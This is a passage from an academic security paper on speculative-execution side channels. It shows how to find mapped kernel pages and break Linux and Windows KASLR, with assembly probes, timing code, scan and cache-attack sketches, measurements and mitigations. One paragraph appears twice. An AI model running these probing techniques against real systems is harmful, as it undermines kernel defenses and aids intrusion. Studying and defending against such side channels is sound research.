Listing 6: Checking if address K is mapped

We can further simplify this code by removing the second-level conditional, as shown in Listing 7. The observation here is that whenever we read something from a mapped kernel page we get a 0 back, and whenever the page is not mapped the execution stalls. Therefore, we can use the read value as an offset in a memory access that caches the user-space address (line #6). The offset in rax is 0 in the case of a GPF and thus r11 will be cached. In the case of a non-mapped page, the execution stalls after line #5. Note that removing the register offset would remove the dependency between lines #5 and #6 and thus allow for instruction reordering, destroying the side channel.

1 << ... >>          ; slow condition -> ZF=1
2 je C1True
3 C1False:
4 ; --- START of SPECULATION ---
5 mov rax,[r10]      ; r10 = K
6 mov rsi,[r11+rax]  ; r11 user address
7 jmp Exit
8 ; --- END of SPECULATION ---
9 C1True:
10 jmp Exit
11 Exit:
12 << measure [r11] access time >>

Listing 7: Checking mapped pages via load dependency

F. Reasoning About the Observed Side Channel

Having this side channel at hand, it is not hard to see that schemes like KASLR that try to hide the presence of kernel pages are severely threatened. One immediate question that came to our mind was: why does the CPU proceed with speculative execution in the case of access violations (thereby creating this side channel)? We expected the CPU to stall the execution whenever any fault occurs, be it either insufficient privileges or a page fault. In practice, however, we see a clear difference.

In the following, we try to explain the underlying process in these two scenarios. Due to the lack of documented details on CPU internals, this explanation has to be taken with a grain of salt. The core problem is caused by the fact that faults cannot be handled by the memory unit during speculative execution, i.e., they are only dealt with at the commit stage. In the case of kernel memory accesses, we have two types of faults: a general protection fault (GPF) occurs if the memory is mapped, but we do not have sufficient access rights to read it; a page fault (PF) occurs when the memory is not mapped at all. Given that memory units cannot handle faults speculatively (until later at the commit stage), there are two different scenarios how these two faulty memory accesses are serviced. In the case of a GPF, the memory access is actually still carried out by the L1 data cache. However, because of the privilege fault, the actual data is not put into the load buffer entry; instead the entry is marked as faulty, to be handled later at the commit stage. Remember that each memory access allocates a new load buffer entry, which remains allocated until the micro-OP is committed. The observed value 0 in such cases can either be a default load buffer value used when the entry is reserved for the micro-OP, or a value used by the L1 cache for faulty accesses.

In contrast, for a PF, we have a cache miss that will never be resolved, as the page is not mapped. Therefore, the L1 data cache cannot return any value to the load buffer (because it does not have any), and it cannot finish the request (because it cannot handle faults while speculating). Note that the L1 data cache has a limited number of entries for handling ongoing cache misses. This means that the entry for handling the memory read will remain allocated for the entire speculation. This will additionally stall the load buffer entry that waits for the result, as well as any instructions that depend on the read value.
G. Kernel-Probing Specific Feedback Channel

We can leverage the fact that page faults stall the execution engine to design an even easier and faster way to determine whether a page is mapped. For this we use the following observation: for non-mapped pages, the bottleneck on the number of outstanding memory accesses is the number of ongoing loads the L1 data cache can track (e.g., 32 in Haswell). For mapped addresses, the bottleneck is the number of load buffer entries (e.g., 72 in Haswell). This means that, if we have a non-mapped address K, executing mov rax,[K] 32 times will stall the execution of the following load instructions. However, if address K is mapped, then the execution of loads will only stall after the CPU runs out of load buffer entries, i.e., after executing mov rax,[K] 72 times in Haswell. Therefore, any number of loads (mov rax,[K]) between 32 and 71, followed by reading a user-space feedback address U (mov rsi,[U]), will result in caching U if and only if the page at address K is mapped.
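A sketch of the speculated probe body could hence look as follows (our illustration; the count of 48 is one arbitrary choice from the valid range 32–71 on Haswell, and r10/r11 follow the register conventions of the earlier listings):

1 ; speculated path; r10 = probed kernel address K, r11 = user feedback address U
2 mov rax, [r10]  ; repeat this load 48 times:
3 ...             ; stalls after 32 loads if K is unmapped,
4 mov rax, [r10]  ; but keeps issuing if K is mapped
5 mov rsi, [r11]  ; reached (and U cached) only if K is mapped
6 ; afterwards: measure the access time of [r11] as in Listing 2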

TABLE I: List of Intel's microarchitectures tested.

µ-arch.       | Model Name                         | Year
--------------|------------------------------------|-----
Skylake       | Intel® Core™ i5-6200U @ 2.30GHz    | 2015
Haswell       | Intel® Core™ i5-4690 @ 3.50GHz     | 2013
Sandy Bridge  | Intel® Xeon® E5-2430 v2 @ 2.50GHz  | 2011
Nehalem       | Intel® Xeon® L5520 @ 2.27GHz       | 2008
Prescott      | Intel® Xeon™ 3.20GHz               | 2004

TABLE II: Prediction behavior and characteristics.

µ-arch.   | FJ¹ | LB² Entries | PL³
----------|-----|-------------|----
Skylake   | N   | 72          | 40
Haswell   | N   | 72          | 32
S-Bridge  | T   | 64          | 32
Nehalem   | N   | 48          | 11
Prescott  | N   | –           | 19

¹ Forward Jump: Taken (T) / Not taken (N). ² Load Buffer. ³ Parallel Loads.

V. EVALUATION

We will now perform the described analyses on five x86 microarchitectures. Each microarchitecture is a different iteration of the implementation of the CPU circuitry, thus affecting the execution process while still keeping the high-level semantics mostly the same. To see how the inner workings of CPUs may have changed, we gathered a wide selection of Intel CPUs with architectures ranging from the year 2004 to a recent one from 2015. The complete list of the microarchitectures used in our experiments is shown in Table I. Throughout the remainder of the paper, we will refer to each of the CPUs by its microarchitecture codename.

A. Revealing Microarchitecture Details

As a first experiment, we applied several of the tests described in Section IV to reveal the inner workings of the different architectures. That is, we experimentally reveal the static prediction strategy, the number of load buffer entries, and the maximum number of parallel cache misses. Table II summarizes the outcomes of those measurements, showing that the various Intel architectures differ in their characteristics. The general trend is that both the number of load buffer entries and the number of parallel loads increased over the years. For the static prediction strategy, there is a more coherent picture: all microarchitectures except Sandy Bridge fall through forward jumps. We will use these architecture-dependent results to adapt the code snippets used in the following experiments, especially regarding prediction expectation and load buffer usage.

For Kernel ASLR derandomization we use both of our attack techniques from Section IV-E and Section IV-F. In the following sections we will present our findings.

B. Measuring the Execution Time

In Section IV we have described ways to identify whether a page is mapped or not. All feedback channels we presented relied on timing differences due to memory caching. To measure such time differences between cached and non-cached memory accesses, we use hardware timestamp counters (rdtsc and rdtscp). Such counters deliver higher-than-nanosecond precision and are sufficient to differentiate the two cases. However, as these instructions could be reordered during the execution on a CPU, care needs to be taken to get the measurements as precise as possible.
To this end, we resort to serializing instructions that prevent instruction reordering (in particular, we use cpuid). The code for measuring a memory access at address U is shown below:

1 cpuid         ; serializing point
2 rdtsc         ; start measuring
3 mov r11, rax  ; store measurement
4 mov rax, [U]  ; access memory
5 rdtscp        ; end measuring
6 mov r12, rax  ; store measurement
7 cpuid         ; serializing point
8 sub r12, r11  ; r12 = time diff

Listing 8: Measuring access time via timestamp counters.

The code in Listing 8 performs the following steps (by line):

1) cpuid waits for all preceding instructions to finish before it gets executed. This introduces a serializing point to ensure that no instruction before it will get executed after it.
2) rdtsc reads the initial counter value, which will be returned in the edx:eax register pair (high and low halves, respectively).
3) We are interested in smaller values that fit in 32 bits and thus only store the lower part, i.e., eax, in r11.
4) We read the data at address U. This is the access for which we want to measure the time.
5) For the second measurement, we use the rdtscp instruction to get the final timestamp counter. rdtscp is specially designed to read the timestamp counter only after all memory operations before it are done, which exactly matches our needs.
6) We store the new counter value into r12.
7) To be sure that no subsequent instructions will be scheduled together with the rdtscp instruction, we use another serializing point (cpuid).
8) Using the two timestamp values in r12 and r11, we subtract them to get the difference.

This code allows us to measure only the time needed for the memory access, without adding too much noise. For older CPUs that do not support rdtscp yet, we resort to using rdtsc for the second measurement as well, and additionally precede it with cpuid, so that rdtsc is not scheduled together with the memory access that we want to measure. By doing so we introduce another instruction (cpuid) between the two measurement points. This will add some overhead to the returned values. Nevertheless, the overhead will be included in both cached and non-cached memory accesses, and thus the difference will remain the same.
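On such older CPUs, the second measurement point of Listing 8 could be rewritten as follows (our sketch of the described fallback; the constant cpuid overhead cancels out when comparing cached and non-cached accesses):

1 cpuid         ; serializing point
2 rdtsc         ; start measuring
3 mov r11, rax  ; store measurement
4 mov rax, [U]  ; access memory
5 cpuid         ; keep the next rdtsc from overlapping the access
6 rdtsc         ; end measuring
7 mov r12, rax  ; store measurement
8 sub r12, r11  ; r12 = time diff (plus constant cpuid overhead)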

C. Differentiating Between Mapped/Unmapped Kernel Pages

At this point we have all the prerequisites to measure timing differences accurately. We will now use this methodology to evaluate the feedback channels as proposed in Section IV-B and Section IV-G. We will first focus on the two feedback channels that cache a specific user-mode memory address. Given the lack of conceptual differences, we will treat them equally in this section and benchmark the timing differences between accessing a cached (mapped kernel page) and non-cached (non-mapped kernel page) address using the two-level speculation method proposed in Section IV-B1. Figure 2 summarizes the timings, more specifically their minimum, median, and average values over 1000 runs.

[Figure 2 plots omitted: per-architecture access-time distributions (in cycles) for mapped vs. not-mapped kernel pages. Panels:]

(a) Skylake (b) Haswell (c) Sandy Bridge (d) Nehalem (e) Prescott

Fig. 2: Results of the caching side channel. If left (mapped) and right (not mapped) deviate, feedback is reliable.

Given that we use rdtsc for the measurements, the timings approximate the number of cycles⁵ for the corresponding memory accesses. As we want to see whether memory is cached or not, we will later resort to the more reliable minimum values.

⁵ http://www.forwardscattering.org/post/15

Figure 2 clearly shows timing differences between mapped and non-mapped pages for most architectures. Two architectures are worth mentioning in particular, as their behavior differed from the others. In Nehalem, accessing a non-mapped memory page does not stall the dependent instructions in the pipeline; instead it also returns 0 as a value. Therefore, the techniques defined in Section IV-E (two-level speculation in Listing 6 or the dependent load in Listing 7) will not work there. However, resource exhaustion of architectural buffers (Section IV-F) works seamlessly and we report these numbers instead. In particular, following Table II, we used between 11 and 47 load instructions to the probed address followed by a caching instruction, as Nehalem features 11 parallel cache misses and 47 usable load buffer entries, respectively.

Prescott also prevents the first approach, as both kinds of faulting addresses stall the pipeline and therefore the caching instruction is not executed at all. Similarly, the resource exhaustion technique (Section IV-F) also fails: regardless of the type of fault (i.e., page fault or access violation), consecutive load instructions are stalled after 19 faulty ones.

The flushing-based feedback channel turned out to be less reliable than the caching-based feedback, as the minimum measurements did not show any measurable difference regardless of the branch condition. In the following, we will thus rely on the caching-based feedback channels, which have shown to be accurate. Having said this, we observed significant timing differences between confirmed-but-halted speculative execution (via hlt) and mispredicted execution. For example, on Sandy Bridge, the median of 1000 measurements differed by 16 cycles, and also the average execution time on Nehalem was significantly slower for non-mapped pages. We refer the interested reader to Section IX-A to see how and on which architectures one could use flushing-based feedback.
D. Breaking Linux KASLR

By now, we can successfully identify whether a single kernel address space memory page is mapped, using any of our proposed approaches with equal success. The dependent load technique (as shown in Listing 7) is by far the simplest means of doing so, considering that it uses only two instructions. We will thus use this test to derandomize KASLR on 64-bit Linux (Ubuntu 16.04 LTS; kernel 4.13.0) running on a 4-core Haswell CPU with 32GB RAM. Kernel ASLR is enabled in the OS by default, which, as described in Section II-C, randomizes the location of the kernel image in the range from 0xffffffff80000000 to 0xffffffffc0000000. Given that the starting address of the image is aligned to 2MiB pages, this results in 9 bits of randomness.

For the derandomization attack, we created an executable which takes the probe address as an input and outputs the time it takes to access the user-mode memory address (i.e., the one that is being cached in the case of a mapped kernel page). To reduce possible noise, we run the program twice per probed address and look at the minimum duration of the two runs. We use a single-threaded process to run the experiment. Increasing the number of parallel processes is possible, but would introduce noise because of hyper-threading, which would require more than two tests per probed address. According to our experiments, a single process running each probe twice offered the best compromise between efficiency and accuracy. Using the program as an oracle, we probe each possible address in the KASLR memory range with 2MiB increments (which corresponds to Linux KASLR's alignment size). In principle, this could be further improved with larger increments that take into account the size of the kernel image, or by using a binary (instead of linear) search. That is, note that we did not strive towards decreasing the search time, in order to find a generic solution that works with any kernel image size (even small ones). Still, using this naïve search, we reliably find every mapped 2MiB kernel page in 2.63 seconds on average.

We use the same approach to search for kernel modules, but modify the search area, given that the possible start address of modules is between 0xffffffffc0000000 and 0xffffffffc0c00000 (page-aligned). This gives us 3072 possible places where modules can be allocated (∼11 bits of entropy).
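The module-region figure follows the same arithmetic as before (a quick check of the stated numbers):

  (0xffffffffc0c00000 − 0xffffffffc0000000) / 4 KiB = 12 MiB / 4 KiB = 3072 ≈ 2^11.6 places,

i.e., roughly 11 bits of entropy.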

We use the same approach to search for kernel modules, but modify the search area, given that the possible start addresses of modules lie between 0xffffffffc0000000 and 0xffffffffc0c00000 (page-aligned). This gives us 3072 possible places where modules can be allocated (∼11 bits of entropy). Running the above experiment for modules with the modified parameters found all allocated module pages reliably in 14.70 seconds on average.

To evaluate the accuracy of this scheme, we ran the program 1000 times. We use the list of kernel pages in /sys/kernel/debug/kernel_page_tables as ground truth to detect possible false positives and false negatives. Out of 1000 runs, our program always correctly identified 11 out of 11 kernel image pages. As for detecting loaded modules, our program successfully identified all 1316 mapped module pages in 968 out of 1000 runs. For the remaining 32 runs, it only missed a single mapped page. Throughout the test run, our program did not report any false positives.

E. Breaking Linux KASLR in a VM

So far we have constrained the proposed attacks to physical hardware, yet an attacker might be interested in abusing similar techniques in virtualized environments. A core driver for the recent increase in virtualization was the CPUs' virtualization support, which made execution more efficient. One of the features that hardware supports nowadays is extended page tables (EPT), which add another layer of translation to page tables in order to translate guest-physical addresses into host-physical pages. As no hypervisor intervention is required to translate virtual addresses, we can use EPTs to mount our attack even inside a VM. In our next experiment, we carry out our measurements on virtualized 64-bit Linux (Ubuntu 16.04 LTS; kernel 4.14.0) running on a 4-core Haswell CPU with 8GB of virtual RAM. For virtualization we use VirtualBox (Version 5.1.30) with hardware acceleration enabled (the default).

We ran the same measurements as we did for physical machines (Section V-D). As expected, a virtualized environment reduced the efficiency of our approach. Keeping the same parameters (i.e., 2 trials per probed address on a single core), the measurements took on average 2.51 seconds and 17.78 seconds to find the mapped pages of the kernel image and the loaded modules, respectively. Further, the precision of the approach decreased, missing on average 47 out of 528 pages for modules (min/max being 26 and 72, respectively, and median being 47) and 2 out of 11 pages for the kernel image.

To cope with this reduced accuracy, in a second experiment we doubled the number of trials per probed address (i.e., 4 trials instead of 2). This significantly improved the precision of our approach; however, it also doubled the execution time. With increased trials, it takes on average 5.66 seconds to find the kernel image and 33.80 seconds to find the loaded modules. As for the precision of the attack, we observed on average 5 missed pages for modules (min/max being 0 and 52, respectively, and median being 4) and 1 missed page for the kernel image. Note, however, that despite the missed pages, it is trivial for an attacker to correctly identify the area of the kernel image as long as the missed pages are not at the edge of the image—which, given the overall size of the region found, can easily be verified. Additionally, one can probe for neighboring pages after the initial scan to find possible false negatives, or simply repeat measurements.
F. Breaking Windows KASLR

After demonstrating how the security guarantees of Linux KASLR are undermined by speculative execution, we now turn to the Windows OS. We chose a Skylake CPU and Windows 10 (version 1709) for our evaluation. Despite our attack being OS-agnostic, we still had to adjust our test program for Windows. More specifically, we have to work around user-land ASLR implementation differences between Windows and Linux. In contrast to Linux, which randomizes executables at every run, Windows randomizes them using a fixed seed determined at boot time. Consequently, running the same test program multiple times does not re-randomize base addresses, which we had used to evade dynamic prediction. To solve the problem, we created a single executable probing multiple addresses one after another in consecutive speculative memory accesses, derandomizing the address space in a single run. As a side effect, this drastically improved the performance of our test program. Similar to our attack against the Linux kernel (Section V-D), we also run this program as a single process, this time using just one probe per address.

The second challenge in Windows comes from KASLR itself. We observed that the kernel image is always loaded together with the hardware abstraction layer (HAL) module. However, the loading order is randomized (e.g., Kernel→HAL or HAL→Kernel). Additionally, although both the kernel image and the HAL are allocated on consecutive large pages (pages that are 2MiB instead of 4KiB), their entry points are randomized inside the large page and can start at any 4KiB boundary. Given that we can only probe for mapped pages, this attack only allows us to find the base address of the large pages containing the kernel image and the HAL, not their actual entry points. However, this still removes 18 bits of KASLR randomness and can be used in combination with other techniques (e.g., those discussed in Section VII) to break the remaining 9 bits (i.e., the 4KiB-aligned kernel offset).

According to Section II-C, we scan the kernel address range from 0xfffff80000000000 to 0xfffff88000000000. Given the alignment of large pages, we step through the memory in 2MiB increments, giving us in total 262144 tries. We verified that only the kernel image allocates five consecutive 2MiB pages and use this as its fingerprint. Running the experiment 100 times showed that the kernel image area in Windows can be found in under a second (0.55s) on average. (Note that the additional overhead in the Linux experiments was due to loading and removing the executable for each memory probe, which could also be heavily optimized.) Out of the 100 runs, all 5 pages were found 74 times, a single page was missed 15 times, and two pages were missed 11 times. Throughout the test run, we did not see any false positives.
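To make the fingerprinting step concrete, the following sketch shows how the five-consecutive-large-pages heuristic can be expressed in code. It is our own illustration; is_mapped() stands in for one speculative probe of the oracle described above and is an assumption, not part of the measured implementation.

#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

#define SCAN_START 0xfffff80000000000ULL
#define SCAN_END   0xfffff88000000000ULL
#define LARGE_PAGE (2ULL * 1024 * 1024)   /* 2MiB large pages          */
#define FP_RUN     5                      /* kernel image fingerprint  */

/* Placeholder: one speculative probe of `addr`; true if the timing
   indicates a mapped page. */
extern bool is_mapped(uint64_t addr);

int main(void)
{
    unsigned run = 0;  /* length of the current run of mapped pages */
    for (uint64_t addr = SCAN_START; addr < SCAN_END; addr += LARGE_PAGE) {
        run = is_mapped(addr) ? run + 1 : 0;
        if (run == FP_RUN) {  /* five consecutive 2MiB pages found */
            printf("kernel image area starts at %#llx\n",
                   (unsigned long long)(addr - (FP_RUN - 1) * LARGE_PAGE));
            break;
        }
    }
    return 0;
}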

VI. DISCUSSION

A. Security Implications of Speculative Execution

We believe that showing how one can derandomize KASLR is just the tip of the iceberg of the security implications that speculative execution may have. Executing arbitrary code on the CPU without consequences (such as segmentation faults), and being able to report results back, is a powerful tool with many potential use cases. One such case is using the arbitrary memory read technique (Section IV-D) from inside a restricted environment that sandboxes memory accesses using bounds checking. For example, consider a JavaScript execution environment in a Web browser that checks whether memory accesses in attacker-controlled code target addresses outside of a well-defined safe region (and thus should be rejected). Given that the majority of modern browsers compile JavaScript into native code, executing arbitrary code on a CPU is feasible even from web applications. Therefore, to gain arbitrary memory reads from inside JavaScript, one has to generate native code similar to that described in Section IV-D. Such an attack could be simplified by using WebAssembly, which allows compiling C/C++ programs into WebAssembly byte code, which itself is compiled into native code by browsers. We leave an evaluation of such attacks open for future work and hope that our analysis of speculative execution will foster new research to understand the full scope of the problem.
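To illustrate the shape of such an in-sandbox primitive, consider the following conceptual C fragment. It is our own sketch of the general pattern rather than code from our implementation: the bounds check is the sandbox's defense, and the speculated body leaves a cache footprint that encodes the out-of-bounds byte.

#include <stddef.h>
#include <stdint.h>

/* Conceptual sketch only: `idx` is attacker-controlled and `len` guards
   the accessible region. If the branch is mispredicted, the out-of-bounds
   byte is read speculatively and encoded into the cache. */
volatile uint8_t probe[256 * 4096];   /* one cache line per byte value */

void speculative_oob_read(const uint8_t *arr, size_t len, size_t idx)
{
    if (idx < len) {                          /* sandbox bounds check */
        uint8_t secret = arr[idx];            /* speculative OOB load */
        (void)probe[(size_t)secret * 4096];   /* cache line depends on it */
    }
    /* Afterwards, timing each probe[v * 4096] (cf. the timed-access
       sketch in Section V) reveals which line was cached, i.e., secret. */
}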
B. Possible Mitigations

We now turn to possible mitigation techniques that can be applied to make systems resistant to our attack.

Hardware Modifications: First, we discuss approaches that require hardware modifications. The naive approach would be to disable speculative execution altogether, which, however, would drastically reduce the performance of the CPU—every branch instruction would stall the execution pipeline. A more reasonable approach would be to stall the execution when a privilege fault occurs. This successfully removes the information leak that we use to distinguish between mapped and non-mapped pages. However, this technique does not get rid of the general problem of side channels in speculative execution. We have already presented two feedback channels in Section IV-B: (i) measuring the complete execution time and detecting differences in rollback complexity in case of mispredictions, and (ii) caching user-space memory. To defeat the former feedback channel, one would need to unify the execution times of micro-ops. Disabling the latter would require forbidding memory loads during speculative execution. However, given that memory accesses are already a bottleneck for modern CPUs, blocking their speculation would incur a significant slowdown. Note that merely disabling nested speculation would not remedy the problem, as one could cache two different memory pages based on the value to leak in first-level speculation. Summarizing, while mitigation in hardware is possible, rigorous security guarantees would imply significant performance degradation.

Attack-Specific Defenses: Although the problem originates from hardware, some attack-specific mitigations can also be applied in software. One such mitigation against our KASLR attack is stronger kernel/user space isolation, which has been proposed multiple times [9], [11], [20], [24]. The basic idea is to separate kernel and user address spaces into different virtual address spaces. This would remove kernel addresses entirely from user-level page tables, thus making them inaccessible. The downside of this approach is the overhead caused by flushing translation lookaside buffers (TLBs) on every context switch from user to kernel mode. Alternatively, one could try to increase the entropy of KASLR, which, however, would only slow down the attack; efficient binary search techniques would reduce the search effort to logarithmic complexity. Also, while any of this would mitigate leaks from kernel into user mode, as we have discussed in the previous subsection, even pure user-mode attacks can be of concern.

It seems more promising to hide the kernel content rather than just its existence. One such solution was recently implemented in OpenBSD and is dubbed Kernel Address Randomized Link (KARL). Instead of randomizing the base address of the kernel image, KARL randomizes the kernel's content (similar to proposed fine-grained randomization schemes in user space [21], [29], [35]). At every system startup, a new kernel image is linked together by combining object files in a random order. Having a completely different layout at each boot prevents the attacker from predicting the addresses of required code or data pieces. KARL thus withstands our proposed derandomization attack, as an attacker can only learn where the kernel is mapped, but not how it is laid out.

Compiler-Assisted Solutions: An interesting defense opens up in a setting where the attacker does not control the compiler that generates the measurement code. For example, consider a setting where an adversary can specify code that is ultimately compiled into byte code (as with WebAssembly). Assume the attacker aims to read beyond a critical memory check via speculative execution. The compiler, assuming knowledge of such critical conditionals (e.g., via code annotations), could then create specific branches that are guarded against misuse. Listing 9 shows an example of such a guarded conditional in a BTFNT setting for the compiled code snippet if (rax == somevar) {...} else {...}. To prevent speculative execution, a guard injects a backward jump (line #4) that is never taken in normal execution, but will be predicted taken—effectively creating an infinite loop that is executed only speculatively. This way, an attacker has no possibility to inject code into the fall-through case that is executed speculatively.

1 cmp rax, [somevar]
2 je Equal
3 FallThrough1:
4 je FallThrough1 ; GUARD: backward jump that is
5                 ; predicted taken in BTFNT
6 ...             ; code in else{} branch
7 jmp Exit
8 Equal: ...      ; code in if{} branch

Listing 9: A guarded conditional hinders static misprediction, assuming BTFNT in this example.

C. Future Work

Affected Vendors and ISAs: The focus of our experiments was Intel x86 CPUs. We have not tried to apply our speculative execution-based attacks against other architectures, but we also have not seen any fundamental reasons why this should not be possible. For example, the CPUs of other CISC vendors like AMD also offer speculative execution engines that would open up similar side channels. In principle, even RISC processors like ARM-based CPUs feature speculative execution, such as the Cortex-R processors [5] or the Cortex-A57 in the LG Nexus 5X smartphone [4]. Having said this, the inner workings of CPUs might differ significantly. For example, if a CPU does not feature nested speculation, the presented side channels require adaptations. With this work, we have proposed several automated tests that identify whether a certain CPU is susceptible to speculation-based side channels. Using this test suite, we aim to broaden our analyses to other architectures in the future.

User-Mode Attacks: We have already conceptually described that user-mode processes might also be at risk from speculative execution (Section VI-A). In immediate future work, we plan to test whether sandboxed environments that allow attacker-controlled code to be JIT-compiled (in particular, browsers) can be abused to read out-of-bounds. Such a proof-of-concept will be a significant research and engineering effort on its own and is thus out of scope for this paper.

VII. RELATED WORK

In the following, we list some of the works that are related to our approach. This includes recent works targeting KASLR, but also side channels in general. We highlight that none of these works has proposed to use speculative execution for their side channels. In contrast, our work is the first to show (i) how speculation can be reliably abused to execute attacker-controlled code that would never be executed without speculation, (ii) that such speculative execution is not free of side effects, as assumed so far, and (iii) that even modern KASLR implementations using high entropy (such as in Windows) are undermined when facing speculation.

A. Using Hardware to Challenge (K)ASLR

Hund et al. [17] propose timing-based side channel attacks against KASLR. They describe three different scenarios, Cache Probing, Double Page Fault, and Cache Preloading, in which the attacker is able to leverage side channels in the hardware to derandomize KASLR. The general observation behind these attacks is that, even though memory accesses to kernel space result in privilege faults, their corresponding cache/translation entries are still stored and allow faster consecutive accesses.

The translation cache side channel was further improved by Jang et al. [19] using Intel's TSX (Transactional Synchronization Extensions). TSX allows handling faulty memory accesses without OS intervention, reducing measurement noise. The authors managed to map the whole kernel space, as well as to distinguish the executable privileges of its pages.

Instead of accessing privileged memory pages directly, Gruss et al. [14] suggest using prefetch instructions. Among the advantages of prefetch instructions are that they do not cause page faults and ignore privilege checks; however, they still go through the same translation/lookup as a regular memory access would, and thus leave a measurable trace behind.

Another KASLR derandomization attack, by Evtyushkin et al. [12], is more closely related to our approach, in that it also uses branch predictors. However, instead of abusing speculative execution to run arbitrary code without consequences, the authors cause collisions in branch target buffers (BTBs) and thus leak the lower address bits of randomized pages.

User-space ASLR has been challenged by others as well. Gras et al. [13] use MMU features to derandomize ASLR by executing JavaScript code in a victim's browser. Bosman et al. [7] use the memory deduplication feature of operating systems to leak memory pointers from JavaScript, thus also resulting in successful ASLR derandomization (although the consequences of the complete attack were more significant than breaking ASLR). Similarly, Barresi et al. [6] use memory deduplication in virtual machine monitors to leak the address space layout of neighboring VMs.

B. CPU-Related Side Channels

The need to run multiple processes on the same machine creates a requirement to share limited resources among all of them. This opens an opportunity for an adversarial process to leak sensitive information about its environment by looking at the utilization of those resources. For example, instruction caches have been used to leak information about the execution trace of co-existing programs on the same execution core [1]–[3], [8], or even across different VMs on the same machine [38], allowing the attacker to reconstruct sensitive information, e.g., private keys of cryptographic protocols.

In contrast to instruction caches, where the attacker recovers the execution trace of a program, data cache attacks can reveal the data access patterns of neighboring processes and thus the underlying operation. These types of attacks have been shown to be successful in reconstructing different cryptographic secrets, such as AES keys [34]. Similarly, a last-level data cache side channel can be used to reconstruct private keys [15], or to leak sensitive information across VMs, e.g., keystroke timings to snoop user-typed passwords in SSH [31].

One technique for leaking cache usage information on x86 is the Flush&Reload attack [36]. In this attack, the attacker issues the clflush instruction to flush the victim's cache lines. Measuring accesses to the same cache lines later reveals whether they have been accessed in the meantime. However, Flush&Reload assumes that the attacker has access to the victim's memory pages (e.g., via shared pages). Prime&Probe [26], in contrast, does not require shared memory regions, and instead relies on cache collisions in caches shared between the attacker and the victim.
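As a brief illustration of the Flush&Reload primitive, the following C sketch uses compiler intrinsics; it is our own reconstruction, and THRESHOLD is a machine-specific calibration value rather than a fixed constant.

#include <stdbool.h>
#include <stdint.h>
#include <x86intrin.h>   /* _mm_clflush, _mm_mfence, _mm_lfence, __rdtsc, __rdtscp */

#define THRESHOLD 100    /* cycles; placeholder, calibrate per machine */

/* Flush&Reload on one shared cache line: flush it, let the victim run,
   then time a reload; a fast reload means the victim touched the line. */
static bool victim_accessed(volatile uint8_t *shared)
{
    unsigned aux;
    _mm_clflush((const void *)shared);   /* evict the shared line */
    _mm_mfence();
    /* ... wait while the victim executes ... */
    uint64_t start = __rdtsc();
    _mm_lfence();
    (void)*shared;                       /* reload the line */
    uint64_t end = __rdtscp(&aux);
    return (end - start) < THRESHOLD;    /* still cached => victim access */
}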
VIII. CONCLUSION

Speculative execution has long been ignored by the security community, although it bears critical threats that undermine important assumptions of existing defensive schemes. We are the first to provide a comprehensive overview of its security implications. Such an understanding is crucial for security researchers to assess the guarantees of existing solutions. Our adversarial setting may seem contrived compared to usual threat models, as we assume that the attacker has influence on the executed code. However, we argue that the proposed side channels highly affect existing defenses, such as conditionals that constrain unsafe code to certain memory regions—especially in the realm of JIT compilation, as in browsers. The recent rise of KASLR derandomization techniques demonstrates that abusing speculative execution is clearly a novel type of attack class that needs further consideration.

REFERENCES

[1] O. Acıiçmez, "Yet another microarchitectural attack: exploiting I-cache," in Proceedings of the 2007 ACM Workshop on Computer Security Architecture. ACM, 2007, pp. 11–18.

[2] O. Acıiçmez, B. B. Brumley, and P. Grabher, "New results on instruction cache attacks," in CHES. Springer, 2010, pp. 110–124.

[3] O. Acıiçmez and W. Schindler, "A vulnerability in RSA implementations due to instruction cache analysis and its demonstration on OpenSSL," in CT-RSA, vol. 8. Springer, 2008, pp. 256–273.

[4] ARM, "ARM Cortex-A57 MPCore Processor Technical Reference Manual." [Online]. Available: http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.ddi0488c/BABHEHHA.html

[5] ARM, "ARM Cortex-R7 MPCore Technical Reference Manual." [Online]. Available: https://static.docs.arm.com/ddi0458/c/DDI0458.pdf

[6] A. Barresi, K. Razavi, M. Payer, and T. R. Gross, "CAIN: Silently breaking ASLR in the cloud," in 9th USENIX Workshop on Offensive Technologies (WOOT 15). Washington, D.C.: USENIX Association, 2015. [Online]. Available: https://www.usenix.org/conference/woot15/workshop-program/presentation/barresi

[7] E. Bosman, K. Razavi, H. Bos, and C. Giuffrida, "Dedup est machina: Memory deduplication as an advanced exploitation vector," in Security and Privacy (SP), 2016 IEEE Symposium on. IEEE, 2016, pp. 987–1004.

[8] C. Chen, T. Wang, Y. Kou, X. Chen, and X. Li, "Improvement of trace-driven I-Cache timing attack on the RSA algorithm," Journal of Systems and Software, vol. 86, no. 1, pp. 100–107, 2013.

[9] O. R. Chick, J. Snee, L. Carata, R. Sohan, A. Rice, and A. Hopper, "Shadow kernels: A general mechanism for kernel specialization."

[10] K. Cook, "Linux kernel ASLR (KASLR)," Linux Security Summit, 2013.

[11] N. Dautenhahn, T. Kasampalis, W. Dietz, J. Criswell, and V. Adve, "Nested kernel: An operating system architecture for intra-kernel privilege separation," ACM SIGPLAN Notices, vol. 50, no. 4, pp. 191–206, 2015.

[12] D. Evtyushkin, D. Ponomarev, and N. Abu-Ghazaleh, "Jump over ASLR: Attacking branch predictors to bypass ASLR," in Microarchitecture (MICRO), 2016 49th Annual IEEE/ACM International Symposium on. IEEE, 2016, pp. 1–13.

[13] B. Gras, K. Razavi, E. Bosman, H. Bos, and C. Giuffrida, "ASLR on the line: Practical cache attacks on the MMU," in NDSS, 2017.

[14] D. Gruss, C. Maurice, A. Fogh, M. Lipp, and S. Mangard, "Prefetch side-channel attacks: Bypassing SMAP and kernel ASLR," in Proceedings of the 2016 ACM SIGSAC Conference on Computer and Communications Security. ACM, 2016, pp. 368–379.

[15] D. Gullasch, E. Bangerter, and S. Krenn, "Cache games – bringing access-based cache attacks on AES to practice," in Security and Privacy (SP), 2011 IEEE Symposium on. IEEE, 2011, pp. 490–505.

[16] R. Hund, T. Holz, and F. C. Freiling, "Return-oriented rootkits: Bypassing kernel code integrity protection mechanisms," in USENIX Security Symposium, 2009, pp. 383–398.

[17] R. Hund, C. Willems, and T. Holz, "Practical timing side channel attacks against kernel space ASLR," in Security and Privacy (SP), 2013 IEEE Symposium on. IEEE, 2013, pp. 191–205.

[18] Intel, "Intel 64 and IA-32 Architectures Optimization Reference Manual." [Online]. Available: https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-optimization-manual.pdf

